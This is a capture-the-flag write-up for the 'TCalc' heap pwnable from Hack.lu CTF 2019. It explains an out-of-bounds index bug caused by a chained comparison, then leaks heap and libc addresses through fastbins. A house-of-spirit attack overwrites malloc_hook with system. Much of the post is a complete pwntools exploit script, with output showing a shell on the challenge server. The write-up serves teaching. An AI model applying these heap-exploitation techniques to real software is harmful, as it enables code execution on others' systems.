[picoctf19] TCalc Writeup | Fascinating Confusion

Fri 25 October 2019
ctf
Galile0
ctf writeup pwn exploit heap oob hacklu 2.30 house-of-spirit fastbin

TCalc was a pwnable challenge during the recent Hack.lu CTF 2019. It was worth 381 points and rated medium. As all somewhat more difficult exploit challenges, it was a heap challenge. Somewhat unusual was the usage of libc version 2.30, which I haven't seen much in CTFs. The bug was a very fascinating programming error resulting in an OOB array access that could be used to arbitrary free. This write-up will try to not only describe the solution but also the pitfalls and things that didn't work.

We were given the source code, the used Libc and of course the binary itself.

root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# checksec chall
[*] '/root/hax/MiscPwns/hacklu19/tcalc/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# ./ld-2.30.so ./libc.so.6
GNU C Library (GNU libc) stable release version 2.30.
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 9.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.archlinux.org/>.

As we can see all protections are enabled and we have Libc version 2.30.

Setup

The distro I am using was still on Libc version 2.28. Therefor my dynamic interpreter (The LD.so file) is incompatible with the provided Libc. Running the program with LD_Preload, or calling Libc directly results in a segfault. But you can simply download a packaged version of the correct GLibc and use the matching dynamic interpreter as a wrapper when starting the binary. I will also use this trick further down when starting the binary from the exploit script

Looking at the source of the binary reveals three basic functions:

Add numbers
Calculate average
Delete numbers

Let's go and find some bugs. Don't worry, you don't even have to leave your house for that.

Identify the Bug

For storing numbers the program uses a simple array of pointers which is stored on the heap. The number array uses the first index as a count. When adding numbers we are asked to specify the count of numbers we want to add, which means we can indirectly control the input for malloc. The other two operations (Average and Delete) are based on a user supplied index. Since the slots are cleared upon delete we don't have any UAF or Double Free. Also note that the program uses calloc, which means we won't be able to get any freed TCache back and memory get's zeroed out before being returned. And we also can't use any index below 0 or above 10 because of the following check which is in the delete, as well as in the average function:

1	if(!(0 <= idx < ARR_LEN) \|\| data[idx] == NULL){exit(0);}

Or can we?! Let's take a look at the function in our favorite disassembler:

Since the program has two conditions to check, we would expect two branches. But we only see one. It's easy to spot that something went wrong. But what exactly happened here?

This is a rather common mistake in different languages, where programmers write something that is human readable, but interpreted differently by the compiler. Let's take a look at the condition !(0 <= idx < ARR_LEN). Your typical programming language will evaluate it from left to right. So it will start with 0 <= idx, which is true for all positive values of idx. So it will evaluate to 1. Now it will continue and actually do the following: 1 < ARR_LEN. Which will always be true. The programmer wanted to do 0<=idx && idx < ARR_LEN to verify, that the idx variable is within some defined boundary. Instead he basically added an always true condition. The result is a pretty straight forward Out-Of-Bound (OOB) free/print.

Possible attacks

Before starting to do anything, we should lay out some kind of plan, and think about what attacks are even possible. We aren't size restricted in our allocations, so most heap attacks should be feasible. We can also use an arbitrary free to some extend. This means the most reasonable attack seems to be some kind of house of spirit. Our aim should be to corrupt the FD pointer of a freed Fastbin, and finally get an allocation at malloc_hook. Since we can supply the argument to malloc we can just overwrite the malloc_hook with system and call it with the address of /bin/sh. Since we have not UAF we need to forge some heap pointers. This means we also need some leaks, notably of the heap and Libc addresses.

Exploit Skeleton

Let's just get a basic skeleton that will execute our exploit and give us some convenience functions.

#!/usr/bin/env python
from pwn import *
from binascii import hexlify
import sys, struct

#convenience Functions
s       = lambda data               :io.send(str(data))        #in case that data is a int
sa      = lambda delim,data         :io.sendafter(str(delim), str(data), timeout=context.timeout)
sl      = lambda data               :io.sendline(str(data))
sla     = lambda delim,data         :io.sendlineafter(str(delim), str(data), timeout=context.timeout)
rl      = lambda numb=4096          :io.recvline(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
irt     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))

# Exploit configs
remote_port = 31337
remote_libc = 'libc.so.6'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
binary_path = 'chall'
ld_path = 'ld-2.30.so'
remote_ip = '<INSERT REMOTE IP>'

@atexception.register
def handler():
    if sys.last_type in [EOFError, struct.error]:
        data = io.stream()
        if data:
            log.failure("Connection got closed, last data received:")
            log.failure(data)
        else:
            log.failure("Connection got closed, no data pending")

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE:
        return
    log.info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        if binary.address == 0:
            log.warning("Setting relative Breakpoints but binary has not been rebased")
        cmds += 'b *' + str(binary.address + b) + '\n'
    gdb.attach(io, gdbscript='\n'.join(cmds))

def add(nums, cnt=None):
    if not cnt:
        cnt = len(nums)
    sla(delim, 1)
    sla(delim, cnt)
    for num in nums:
        sl(num)
    if len(nums) < cnt:
        sl('a') # to break out of read

def show(idx):
    sla(delim, 2)
    sla(delim, idx)
    avg = rl().split('is: ')[1]
    return avg

def delete(idx):
    sla(delim, 3)
    sla(delim, idx)

if __name__ == '__main__':
    # context.timeout = 1
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target

    binary = ELF(binary_path)
    libc = None
    delim = '>'

    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(remote_ip, remote_port)
        libc = ELF(remote_libc, checksec=False)
    elif args.STAGING:
        io = process([ld_path, binary_path], env={'LD_PRELOAD': remote_libc})
        libc = ELF(remote_libc, checksec=False)
    else:
        io = binary.process()
        libc = ELF(local_libc, checksec=False)
    if not args.REMOTE:
        for m in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            if binary.path.split('/')[-1] in m:
                binary.address = int(m.split("-")[0],16)

    # Exploit Code goes here
    irt()

This script will allow us to develop our exploit against the locally used Libc, the Libc used by the challenge on the server (STAGING), or the remote target. We can also set relative breakpoints and launch GDB from our script. Even if you don't use GEF or pwndbg, it will allow you to set relative breakpoints since the script reads the PIE base from proc and rebases the binary accordingly. Just call it with ./exploit py STAGING or without parameters to use your local Libc.

Getting some Leaks

About this section

This section will describe how to acquire Heap and Libc leaks. If you just want to know how to get code execution you can skip this

To be honest, this took me quite some time. The program stores the numbers array on the heap and does any access (average and delete) based on a user supplied index for that array. Getting a leak is obviously only possible through the average function, which takes an index, looks the pointer to the numbers array (also stored on the heap) up, and calculates the average of the values in that array where size is encoded in the first value. This means we can only leak data stored on the heap, and we also need a pointer to that data, which has to be stored on the heap as well. Since the first 8 bytes of the numbers array to be used by the average function are used as the count value we also can't just point to whatever we want. Let's see what doesn't work.

The TCache Fail

About this section

This section is a rather lengthy description of a wrong path I took during solving the challenge. This cost me around 3 hours. But I think it's important to show that not everything is as straight forward and clear as write-ups make it seem to be. If you are just interested in the solution, I recommend skipping this section

My initial idea was to use the TCache mechanism for the leaks. When you free a chunk in TCache size (and the corresponding TCache has less than seven entries) your chunk get's populated with a pointer to the next free TCache chunk as well as a pointer to the TCache per_thread struct. This struct stores the count as well as a pointer to the last entry for each TCache-bin. Since this struct is also stored on the heap, it has a pointer to every first chunk of a TCache. This means we could theoretically use a negative index to read a value out of the per_thread struct, which points to a free TCache, and get some heap values this way. Let's try it out by adding a number and deleting it again:

1
2
3

add([1])
delete(0)
launch_gdb()

Let's check how it looks like on the heap:

As we can see the per_thread_struct holds the TCache count (marked yellow), and a pointer to the first free TCache (marked red) for each size-bin. Our numbers array is at offset 0x250, and currently empty since we just deleted the first entry again. And the free chunk that we created by deleting the first entry has it's first value set to 0 (since there is no other free chunk to point to) and the second pointer goes to the per_thread_struct again.

Now we can point the get_average function to whatever address we want by using the OOB access, but wherever we point, there needs to be a pointer and that pointer should point to a location that looks like a valid numbers array (So the first value interpreted as the count has to be reasonable). Looking at our memory we could supply an index which get's resolved to the free chunk. This chunk has a pointer to the per_thread_struct. And the first 8 Bytes of the per thread struct are the count of the free TCache bin. This sounds pretty good since it means we can control it by allocating and freeing a specific number of corresponding TCaches. Also, there is a legit heap pointer further down, so summing up at least 8 values would leak us a heap pointer. Sadly, a TCache can only hold up to 7 free chunks, so we can only fake count values from 0-7 (Just missing our pointer in the average calculation). We could also use the next size of the TCache bin, which would result in a minimum count of 0x100. Since this value is interpreted as an integer value, it would try to read 0x100 8 byte values and sum them up. That's a lot of memory, but still alright, so let's try it out:

1
2
3

add([1,1,1])
delete(0)
print hexdump(show(527))

If you're wondering why the 527: (0x55555555a2d8-0x555555559260) / 8. We just need to calculate the offset between the first entry of the **numbers array and the address where our pointer to the per_thread_struct lives. The struct itself will look like this:

0x555555559010: 0x0000000000000100  0x0000000000000000
0x555555559020: 0x0000000000000000  0x0000000000000000
[...]
0x555555559050: 0x0000000000000000  0x000055555555a2d0
0x555555559060: 0x0000000000000000  0x0000000000000000

Which means the average function will sum up 0x100 8-byte pointers starting from 0x555555559018. This means everything between 0x555555559018 and 0x555555559010+0x100*8=0x555555559810. The result given is: 366504545509.464844. Lets do some calculations and see if we can find our pointer:

>>> hex(int(366504545509.464844*0x100-0x61-0x01011-0x000000000a373235))
'0x55555555a2d0'

Looks good to me. If you wonder where those values I subtracted come from: those are just the values (Like chunk sizes) on the heap in the averaged memory area. Most notable the scanf buffer. But luckily it is all user controlled.

Now you may wonder where the fail comes. Try launching the script with STAGING as an argument. And you will crash with SIGSEGV. But why? Well, some debugging will show that the per_thread_struct with the challenge Libc actually looks like this:

0x7ffff7fff000:     0x0000000000000000      0x0000000000000291
0x7ffff7fff010:     0x0000000000010000      0x0000000000000000 <- See this shit?
0x7ffff7fff020:     0x0000000000000000      0x0000000000000000
0x7ffff7fff030:     0x0000000000000000      0x0000000000000000

The struct takes up a lot more space and our count of freed TCaches went one byte to the left. But why? Let's take a look at what changed in the per_thread_struct between libc.2-29 (My local version) and libc-2.30 (The version used by the challenge):

// From libc-2.29 malloc.c Line 2916
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

// From libc-2.30 malloc.c Line 2906
 typedef struct tcache_perthread_struct
{
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

As you can see, for some reason (If you know more, let me know), the size of count was changed from char (one byte) two uint16 (two bytes). This means our "fake numbers count" can be 0-6 Bytes long or 0x10000 bytes long. The first one isn't enough by a long stretch since the pointer we are interested in is now even further down (since the count takes double as much space). And the second count we can achieve is actually way bigger than the heap (Remember, the count gets multiplied by 8). The program would try to read heap_base+0x10000*8 bytes, which eventually tries to access unmapped memory, and therefor segfaults. This was quite frustrating, but nonetheless a lesson to learn. On to a different approach then.

Actually getting the Heap-Leak

At this point, it always helps to actually get a good understanding of the problem that's blocking you. So let's do that:

We need to leak a heap address
We can only use the average function
For this we need to point it to a valid heap address stored on the heap itself
The first value of the numbers array is the count of values to average, so we have to have a reasonable value there
We can't used the values of a freed TCache since the FD pointer of a free TCache points to its Data and not the Header, therefor the count will always be screwed (Either 0 or some pointer)
We also can't abuse the tcache_perthread_struct since we can't manipulate the count to be actually useful.

Alright, so let's see if there is something that we could overcome. And while going thru this list I noticed something: The FD pointer of a free TCache points to the chunk-data, and not the header. Well, that's uncommon, isn't it? A Fastbin doesn't do this! The FD pointer of a free Fastbin points to the header of the next free Fastbin! And if we correctly align the chunk before that (Use a size multiple of 8) the last 8 byte of the previous chunk would be right where the FD of a Fastbin would point. This means, using Fastbins, we can reliably set the value which will be interpreted as size by the average function. Let's put that into code:

for _ in range(7): # Exhaust TCache
    add([1,1,1,1,1,1,1,1,1,1,1,16])
    delete(0)
    # Note: Cause of calloc we won't ever get a Tcache back
add([1],cnt=12) # Fastbin A
add([1],cnt=12) # Fastbin B
delete(0)
delete(1) # FD now points to Fastbin A

Important note

There is one thing that may not be obvious but will be very important down the line: We use 12 values for the TCache as well as for the Fastbins. 12 was not chosen at random. It was chosen such that the data is placed in a Fastbin of size 0x70. Because when we will overwrite the malloc_hook we will actually leverage a libc address placed right in front. And those always star with 0x7f. So we can only abuse a free 0x70 bin to pass the Fastbin (size) check in libc. With this in mind, we already operate within the correct chunk size.

Looking at the heap after this shows the following:

Marked in yellow is the last TCache we added and freed in the loop. You can see it ends with 0x10, at address $heap+0x610. Next, in green, is Fastbin A, which is just there so Fastbin B, marked blue, can point somewhere. Now Fastbin B (again, in Blue) is the interesting one. It has it's FD pointer set to Fastbin A, but instead of pointing to the data (Like our TCaches do) it points to the header, specifically to $heap+0x610. So if we now point our average function to 0x7ffff8000690 it will average 16 values starting from $heap+0x618 thus leaking FD of Fastbin A.

Fastbin vs. Tcache

This was (for me) the most challenging part of this challenge: realizing a free Fastbin points to the chunk header, while a free TCache points to the chunk data. So simple, yet 3 hours lost. Oh well.

So what value do we give to average? The original numbers array is at 0x7ffff7fff2a0 and our target at 0x7ffff8000690, dividing the difference by 8 gives 638, so this should work. And just for fun: Since we will (again) get the average, let's anticipate the calculation to get the pointer out of our average. Looking at the heap we can guess that it's just: leak*16 - 0x71*2 - 0x1. This will leak the Fastbin address, which means we get a the Heap base-address by subtracting 0x1610. So, let's add some code and test it:

# Get Heap address
leak = show(638)
heap_base = int(float(leak)*16 - 0x71*2 - 0x1) - 0x1610
log.success("Heap-Base @ {:08x}".format(heap_base))

Now, this worked like a charm! What a relief. From here on it should be smooth sailing. Right? ... RIGHT?!

Getting Libc-Leak

Since we know the heap-base address now, we can write arbitrary addresses on the heap and call free or average on them. How to get a libc value on the heap? Well: Add a chunk to big for a Fastbin or TCache and free it again. How to get the average of this? Just put a the pointer to the free chunk somewhere and calculate the index as before. Easy enough:

add([1],cnt=0x410/8) # use smallbin size
add([heap_base + 0x1610], cnt=12) # Reuse Fastbin B, write pointer to smallbin
delete(0) # Free the smallbin to get libc pointer
leak = show(757)
libc_base = int((float(leak)*16 - 0x421) / 2 - 0x1c0a40)
malloc_hook = libc_base + 0x01c09d0
one_gadget = libc_base + 0xeafab #0xcd3aa, 0xcd3ad, 0xcd3b0, 0xeafab
system = libc_base + libc.symbols['system']
log.success("Libc-Base@ 0x{:016x}".format(libc_base))
log.success("mall-hook@ 0x{:016x}".format(malloc_hook))
log.success("one-gadge@ 0x{:016x}".format(one_gadget))

I'm just gonna assume you have seen enough offset calculations at this point so I'm not gonna go into deeper detail why we add heap_base+0x1610 or average at index 757. As you can also see, I've already prepared the one_gadget. This was another fail since the stack just didn't line up for any of those gadgets to work. I left it in, just so you can again see what kind of fails you can encounter. We will instead use system. Which also has it's traps, but let's tackle one problem at a time.

Code Execution

Alright, this section assumes you already have Heap and Libc-Addresses. So how do you get Code Execution? Easiest way is to overwrite either the free_hook or malloc_hook. My favorite is, as I said a few hours ago during the introduction, using the house of spirit. And since I've already carefully used Fastbins of size 0x70 for everything, lets go with that. But oh no!, we have no direct use after free, so we can't really straight forward overwrite the FD pointer of a free Fastbin. But we can free whatever we want! That's just as good.

Overwriting Malloc-hook

First, let's craft something we can then call free on. The idea is that we setup a fake_chunk inside of an actual numbers chunk. We then free the fake chunk. It will get placed in the Fastbin list and it's FD pointer get's populated. Then we free the actual numbers chunk that we used to create the fake chunk. Creating a new numbers array of the same size now allows us to overwrite the values of our free fake chunk. Thus overwriting FD. Confusing? Yeah, for me too. But let's just step through:

1 2	add([heap+0x1640,0,0x71,0,0],cnt=12) # craft Fake chunk and pointer to it add([0x21,0x21,0x21,0x21]) # To fullfill nextsize

Now, the last one is important. There is a check in Libc that checks if a valid size comes after the chunk we try to free. Since I was lazy to count where I have to put this, I just sprayed a little. Nobody's perfect, right?. Let's see how it looks on the heap:

I've tried to mark it as good as possible. In blue is the first chunk, with it's first number set to point to the fake chunk which is starting at the 3rd value and marked yellow. The blue chunk actually continues, I was just too lazy to mark it that way. The yellow chunk is completely fake and made by us. Next comes the green chunk which is just to satisfy this nextsize check of Libc when calling free. We can ignore that. What we've effectively done is to create overlapping chunks. Freeing the yellow chunk and then freeing and reallocating the blue chunk gives us the possibility to overwrite the FD pointer of the yellow chunk. Phew, confusing, let's see:

delete(625) # Free embedded Fake Fastbin 0x70 size
delete(0) # Free surrounding bin
add([0,0,0x71,malloc_hook-35],cnt=12) # Allocate sourinding chunk overwriting fd of fake Fastbin
add([],cnt=12)# Allocate 0x70 bin (use Fastbin)

You may be wondering why we use malloc_hook-35 to overwrite FD. The memory around malloc_hook looks like this:

0x7ffff7fc09c0 <__memalign_hook>:   0x00007ffff7e8b400      0x00007ffff7e8ba90
0x7ffff7fc09d0 <__malloc_hook>:     0x0000000000000000      0x0000000000000000

By using this offset we allocate at the following address:

0x7ffff7fc09ad:     0xfff7fc1dc0000000      0x000000000000007f
0x7ffff7fc09bd:     0xfff7e8b400000000      0xfff7e8ba9000007f
0x7ffff7fc09cd:     0x000000000000007f      0x0000000000000000

As you can see the size is setup perfectly with 0x7f since it has the inuse bit (LSB bit of sizefield) is set and within range of the 0x70 bin. Alright, our next allocation will be at malloc_hook! And we want to write system there. Just one (alright, maybe two) challenge left.

Writing system at malloc_hook

We can only write integers, i.e. 8 Byte values. And since we are not aligned with the malloc_hook anymore we have to be careful what we write.

1
2
3

system_low    = system & 0x000000FFFFFFFFFF
system_high   = system & 0xFFFFFF0000000000
add([0,system_low<<3*8,system_high>>5*8],cnt=12)

Now, this may look funny, but is actually pretty logical. We have to split the value in high and low. But then it will be shifted wrong, so we shift it back to the correct place. We mask our system address such that it fits and then just shift the marked bits to the left, respective right. Just play around with the memory layout or write it out on paper (That's what I did after like an hour of failing) to get a better grasp.

Not a good idea

This method has one disadvantage: There are some cases where the values have a size such that shifting causes an overflow. To be precise this happens if the second MSB is > 0x7f. In this case your malloc_hook will be 0x00007f7fffffffff. But you can just run the exploit again. There is probably a smarter way of getting the value aligned right. But sometimes a workaround is good enough.

Calling system

There is one last thing left: actually call system. Now, the malloc hook just get's the arg of the malloc call passed. And our goal is of course to supply a pointer to '/bin/sh' or similar. But there is one problem: We have no arbitrary control over the malloced size. We can only specify the amount of numbers we want to store, so the value we give is multiplied by 8 before using malloc. This means our /bin/sh address has to be divisible by 8, such that we can supply (sh/8) which results in a malloc with a size expanded to the original sh pointer. But since this string is referenced more than once in Libc, we should get lucky to find it, right?

for addr in list(libc.search("sh\x00")):
    if addr % 8==0:
        sh = libc_base + addr
        break
sh_count = sh/8-1
log.info("Adding a new list with count: {} | sh @ 0x{:016x}".format(sh//8 -1,sh))
add([],cnt=sh_count)

Getting the flag

And just as a proof:

root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# ./exploit.py REMOTE
[*] '/root/hax/MiscPwns/hacklu19/tcalc/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to tcalc.forfuture.fluxfingers.net on port 1337: Done
[+] Heap-Base@ 0x000055f72b9f3000
[+] Libc-Base@ 0x    7f361b0df000
[+] mall-hook@ 0x    7f361b29f9d0
[+] one-gadge@ 0x    7f361b1c9fab
[*] Adding a new list with count: 17483794868834 | sh @ 0x00007f361b0f5318
[*] Switching to interactive mode
uid=1000(chall) gid=1000(chall) groups=1000(chall)
$ cat flag.txt
flag{easy_f0r_thee:_arb1trary_fre3}$ echo 'yay'
yay

And for easy copy/pase the final exploit:

#!/usr/bin/env python
from pwn import *
from binascii import hexlify
import sys, struct

#convenience Functions
s       = lambda data               :io.send(str(data))        #in case that data is a int
sa      = lambda delim,data         :io.sendafter(str(delim), str(data), timeout=context.timeout)
sl      = lambda data               :io.sendline(str(data))
sla     = lambda delim,data         :io.sendlineafter(str(delim), str(data), timeout=context.timeout)
rl      = lambda numb=4096          :io.recvline(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
irt     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))

# Exploit configs
remote_port = 1337
remote_libc = '/root/hax/MiscPwns/hacklu19/tcalc/libc.so.6'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
binary_path = '/root/hax/MiscPwns/hacklu19/tcalc/chall'
ld_path = '/root/hax/MiscPwns/hacklu19/tcalc/ld-2.30.so'
remote_ip = 'tcalc.forfuture.fluxfingers.net'

@atexception.register
def handler():
    if sys.last_type in [EOFError, struct.error]:
        data = io.stream()
        if data:
            log.failure("Connection got closed, last data received:")
            log.failure(data)
        else:
            log.failure("Connection got closed, no data pending")

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE:
        return
    context.terminal = ['tilix', '-a', 'session-add-right', '-e']
    log.info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    # cmds.append('set follow-fork-mode child')
    for b in breakpoints:
        if binary.address == 0:
            log.warning("Setting relative Breakpoints but binary has not been rebased")
        cmds += 'b *' + str(binary.address + b) + '\n'
    gdb.attach(io, gdbscript='\n'.join(cmds))

def add(nums, cnt=None):
    if not cnt:
        cnt = len(nums)
    sla(delim, 1)
    sla(delim, cnt)
    for num in nums:
        sl(num)
    if len(nums) < cnt:
        sl('a') # to break out of read

def show(idx):
    sla(delim, 2)
    sla(delim, idx)
    avg = rl().split('is: ')[1]
    return avg

def delete(idx):
    sla(delim, 3)
    sla(delim, idx)

if __name__ == '__main__':
    # context.timeout = 1
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target

    binary = ELF(binary_path)
    libc = None
    delim = '>'

    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(remote_ip, remote_port)
        libc = ELF(remote_libc, checksec=False)
    elif args.STAGING:
        io = process([ld_path, binary_path], env={'LD_PRELOAD': remote_libc})
        libc = ELF(remote_libc, checksec=False)
    else:
        io = binary.process()
        libc = ELF(local_libc, checksec=False)
    if not args.REMOTE:
        for m in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            if binary.path.split('/')[-1] in m:
                binary.address = int(m.split("-")[0],16)

    for _ in range(7): # Exhaust TCache
        add([1,1,1,1,1,1,1,1,1,1,1,16])
        delete(0)
        # Note: Cause of calloc we won't ever get a Tcache back

    # Prepare Heap Leak
    add([1],cnt=12) # Fastbin A
    add([1],cnt=12) # Fastbin B
    delete(0)
    delete(1) # FD now points to Fastbin A

    # Get Heap address
    leak = show(638)
    heap_base = int(float(leak)*16 - 0x71*2 - 0x1) - 0x1610
    log.success("Heap-Base @ {:08x}".format(heap_base))

    # Leak libc addressess
    add([1],cnt=0x410/8) # use smallbin size
    add([heap_base + 0x1610], cnt=12) # Reuse Fastbin B, write pointer to smallbin
    delete(0) # Free the smallbin to get libc pointer
    leak = show(757)
    libc_base = int((float(leak)*16 - 0x421) / 2 - 0x1c0a40)
    malloc_hook = libc_base + 0x01c09d0
    one_gadget = libc_base + 0xeafab #0xcd3aa, 0xcd3ad, 0xcd3b0, 0xeafab
    system = libc_base + libc.symbols['system']
    log.success("Libc-Base@ 0x{:016x}".format(libc_base))
    log.success("mall-hook@ 0x{:016x}".format(malloc_hook))
    log.success("System@    0x{:016x}".format(system))

    # setup house of spirit
    add([heap_base+0x1640,0,0x71,0,0],cnt=12) # craft Fake chunk and pointer to it
    add([0x21,0x21,0x21,0x21]) # To fullfill nextsize
    delete(625) # Free embedded Fake Fastbin 0x70 size
    delete(0) # Free surrounding bin
    add([0,0,0x71,malloc_hook-35],cnt=12) # Allocate sourinding chunk overwriting fd of fake Fastbin
    add([],cnt=12)# Allocate 0x70 bin (use Fastbin)

    # Overwrite malloc_hook
    system_low    = system & 0x000000FFFFFFFFFF
    system_high   = system & 0xFFFFFF0000000000
    add([0,system_low<<3*8,system_high>>5*8],cnt=12)

    # Call System
    for addr in list(libc.search("sh\x00")):
        if addr % 8==0:
            sh = libc_base + addr
            break
    sh_count = sh/8-1
    log.info("Adding a new list with count: {} | sh @ 0x{:016x}".format(sh//8 -1,sh))
    add([],cnt=sh_count)
    sl('id')
    irt()

I hope you enjoyed it, and maybe learned something new. I certainly did. And if there is one thing I once again had to learn: Sometimes you fail and bang your had because of the most mundane stuff. And that's fine. Just keep learning until you can solve it. Overall this challenge took me like 10 hours. And for most people in this field this may seem way too long. But that's just more reason to keep learning and improving. If you have any question you can always find me on Twitter